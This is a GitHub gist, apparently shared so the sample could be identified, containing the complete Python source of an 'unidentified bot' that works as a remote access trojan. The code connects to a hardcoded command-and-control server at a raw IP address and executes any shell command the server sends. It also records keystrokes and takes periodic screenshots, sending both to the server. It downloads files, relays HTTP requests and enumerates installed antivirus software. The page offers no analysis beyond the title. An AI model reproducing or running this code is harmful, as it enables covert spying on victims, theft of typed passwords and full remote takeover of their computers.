Skip to content

Instantly share code, notes, and snippets.

@th3gundy
Forked from usualsuspect/main.py
Created August 5, 2022 15:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save th3gundy/7ba5f8c0cf9c911f6c49c17b41b2e57b to your computer and use it in GitHub Desktop.
Save th3gundy/7ba5f8c0cf9c911f6c49c17b41b2e57b to your computer and use it in GitHub Desktop.
Unidentified Python bot
import subprocess, socketio
from enum import Enum
import requests
from time import sleep
from PIL import ImageGrab
import os
from datetime import datetime, timedelta
from pynput.keyboard import Listener
allowed_methods = {
'get','post','put','options','delete','patch','head'}
class App:
VERSION = '1.0'
BASE_URL = 'http://169.239.129.108:5555'
KEYLOG_SECONDS_TO_SEND = 8
KEYLOG_SECONDS_TO_LOOP_SLEEP = 60
SC_SHOTS_SENDING_IN_SECONDS = 600
SIO_INSTANCE = None
KEYLOG_BUFFER_SIZE = 603366
@classmethod
def get_config_from_server(cls):
"""
Get client config from server.
"""
try:
res = requests.get(f"{cls.BASE_URL}/client/config")
except Exception as e:
try:
return
finally:
e = None
del e
else:
if res.status_code != 200:
return
res_json = res.json()
cls.update(data=res_json)
@classmethod
def update(cls, *, data: dict):
"""
Update Config static variables.
:param data: should be dict and include one of those keys: (key_logs_minutes,
screen_shots_minutes, base_url)
"""
cls.KEYLOG_SECONDS_TO_SEND = data.get('key_logs_minutes', cls.KEYLOG_SECONDS_TO_SEND) * 60
cls.SC_SHOTS_SENDING_IN_SECONDS = data.get('screen_shots_minutes', cls.SC_SHOTS_SENDING_IN_SECONDS) * 60
cls.BASE_URL = data.get('base_url', cls.BASE_URL)
def request(*, method, url, headers=None, payload=None, query=None):
"""
made http/s requests.
:param method: str, the method name
:param url: str, the url.
:param payload: dict, the url to send.
:param query: dict, optional to send query params in organized way.
:param headers: dict, for adding special headers
:return: request response, or None if request went wrong.
"""
req_func = getattr(requests, method)
req_params = {}
req_params.update({'json': payload}) if payload else None
req_params.update({'query': query}) if query else None
req_params.update({'headers': headers}) if query else None
try:
res = req_func(url, **req_params)
except ConnectionError as e:
try:
return
finally:
e = None
del e
else:
return res
class Actions:
@staticmethod
def pull_file_http(data: dict) -> None:
"""
in pull action, data should contain file that contain the file name
"""
base_url = f"{App.BASE_URL}/static/downloads/"
r = requests.get(f"{base_url}{data.get('file')}")
if r.status_code != 200:
return
filename = r.url.split('/')[-1]
with open(f"./{filename}", 'wb') as f:
f.write(r.content)
@staticmethod
def save_file_from_socket(data: dict) -> None:
"""
in pull action, data should contain file that contain the file name.
"""
print(f"write binary file -> {data.get('file')}")
with open(f"./{data.get('file')}", 'wb') as f:
f.write(data.get('file_data'))
@staticmethod
def made_requests(data) -> None:
"""
made chosen request http/s request
"""
headers, url, method = data.get('headers'), data.get('url'), data.get('method', '').lower()
payload = data.get('payload')
if not url or method not in allowed_methods:
return
res = request(url=url, method=method, headers=headers, payload=payload)
if not res:
return
body = res.text
file_name = str(datetime.now())
payload = {'file_name':file_name, 'file_html':body}
request(url=f"{App.BASE_URL}/client/upload_html", method='post', payload=payload)
@staticmethod
def none(*a, **k):
print('none action been called !!')
class Command(Enum):
def __new__(cls, command_number: str, func: callable):
"""
bind special attribute to enum properties.
:param command_number: the command Identifier.
:param func: function, the function to call, when command need to be running.
NOTE!! all Actions should get data attribute.
"""
enum_field_obj = object.__new__(cls)
enum_field_obj.command_number = command_number
enum_field_obj._value_ = command_number
enum_field_obj.run = func
return enum_field_obj
PULL = (
1, Actions.pull_file_http)
PULL_SOCKET = (2, Actions.save_file_from_socket)
MADE_REQUEST = (3, Actions.made_requests)
RUN_FILE = (5, Actions.none)
@classmethod
def numbers(cls) -> set:
"""
return all types of commands numbers
"""
return {attr.command_number for attr in cls}
class KeyRecorder:
def __init__(self):
self.recorder = ''
self.last_time_key_pressed = datetime.now()
self.thread = None
def on_press(self, key):
self.last_time_key_pressed = datetime.now()
if getattr(key, 'char', None):
self.recorder += key.char
else:
if getattr(key, 'name', None):
self.recorder += f"|{key.name}|"
@property
def buffer_is_bigger_then_threshold(self):
"""
check if recorder is bigger then buffer_threshold.
"""
return len(self.recorder) > App.KEYLOG_BUFFER_SIZE
@property
def report_threshold_time(self):
return datetime.now() - timedelta(seconds=(App.KEYLOG_SECONDS_TO_SEND))
@property
def is_time_for_to_report(self) -> bool:
"""
return True if it is the time to send recorder to server, else False
it will return true if there is some data to send and time passed the threshold_time
"""
return self.recorder and self.last_time_key_pressed < self.report_threshold_time
def clear_recorder(self):
"""
Clear recorder string
"""
self.recorder = ''
def start_recording(self):
"""
Start async recording.
"""
self.thread = Listener(on_press=(self.on_press))
self.thread.IS_TRUSTED = True
self.thread.start()
def create_key_recorder():
key_recorder = KeyRecorder()
key_recorder.start_recording()
return key_recorder
def take_sc_snaps():
"""
On mac its need permissions
"""
size = (1100, 1100)
while True:
sleep(App.SC_SHOTS_SENDING_IN_SECONDS)
try:
screenshot = ImageGrab.grab()
screenshot.thumbnail(size)
App.SIO_INSTANCE.emit('sc_snap', {'image_data':screenshot.tobytes(), 'size':screenshot.size,
'mode':screenshot.mode})
except Exception as e:
try:
pass
finally:
e = None
del e
def run_key_recorder():
"""
recorder
"""
key_recorder = create_key_recorder()
while True:
if key_recorder.is_time_for_to_report:
recorder = key_recorder.recorder
try:
App.SIO_INSTANCE.emit('key_recorder', {'data': recorder})
except Exception as e:
try:
pass
finally:
e = None
del e
else:
key_recorder.clear_recorder()
else:
if key_recorder.buffer_is_bigger_then_threshold:
key_recorder.clear_recorder()
sleep(App.KEYLOG_SECONDS_TO_LOOP_SLEEP)
def get_install_antivirus():
"""
get installed antivirus.
send payload -> {<type: name of anti, str>, <enable: is enable or disable, bool>}
"""
if os.name != 'nt':
print('OS is not windows')
return
import pythoncom
pythoncom.CoInitialize()
from windows_tools import antivirus
installed_antivirus = antivirus.get_installed_antivirus_software()
anti_viruses = {}
for antivirus in installed_antivirus:
if antivirus.get('name') in anti_viruses:
anti_viruses[antivirus.get('name')] = anti_viruses.get('enabled') or antivirus.get('enabled', False)
else:
if antivirus.get('name') is not None:
anti_viruses[antivirus.get('name')] = antivirus.get('enabled', False)
else:
sleep(3)
try:
App.SIO_INSTANCE.emit('anti_viruses', {'data': anti_viruses})
except Exception as e:
try:
pass
finally:
e = None
del e
App.SIO_INSTANCE = socketio.Client()
@App.SIO_INSTANCE.event
def message(data):
print('I received a message!')
@App.SIO_INSTANCE.event
def connect():
print("I'm connected!")
@App.SIO_INSTANCE.on('command')
def on_command(data: dict):
"""
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >}
"""
print(f"I received a message! {data}")
command = data.get('hi')
_id = data.get('id')
if not command:
return
if command == 'what is my version':
App.SIO_INSTANCE.emit('response', {'result':f"my version is - {App.VERSION}", 'id':_id})
return
try:
result = subprocess.check_output(command, stderr=(subprocess.STDOUT), shell=True)
except Exception as e:
try:
result = str(e).encode()
finally:
e = None
del e
else:
if len(result) == 0:
result = 'OK'.encode()
else:
App.SIO_INSTANCE.emit('response', {'result':result, 'id':_id})
return [
{'result': result}]
@App.SIO_INSTANCE.on('action')
def on_action(data: dict):
"""
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >}
"""
action_number = data.pop('action_number', None)
if action_number not in Command.numbers():
return 'not found action'
Command(action_number).run(data)
print(f"I received a message! {data}")
@App.SIO_INSTANCE.on('config')
def on_config(data: dict):
"""
Data: dict in this format -> {'<setting arg>: value'...}
"""
App.update(data=data)
print(f"I received a message! {data}")
@App.SIO_INSTANCE.event
def connect_error(data):
print('The connection failed!')
@App.SIO_INSTANCE.event
def disconnect():
print("I'm disconnected!")
App.get_config_from_server()
App.SIO_INSTANCE.connect((App.BASE_URL), transports=['polling', 'websocket'])
print('my sid is', App.SIO_INSTANCE.sid)
App.SIO_INSTANCE.start_background_task(target=take_sc_snaps)
App.SIO_INSTANCE.start_background_task(target=run_key_recorder)
App.SIO_INSTANCE.start_background_task(target=get_install_antivirus)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment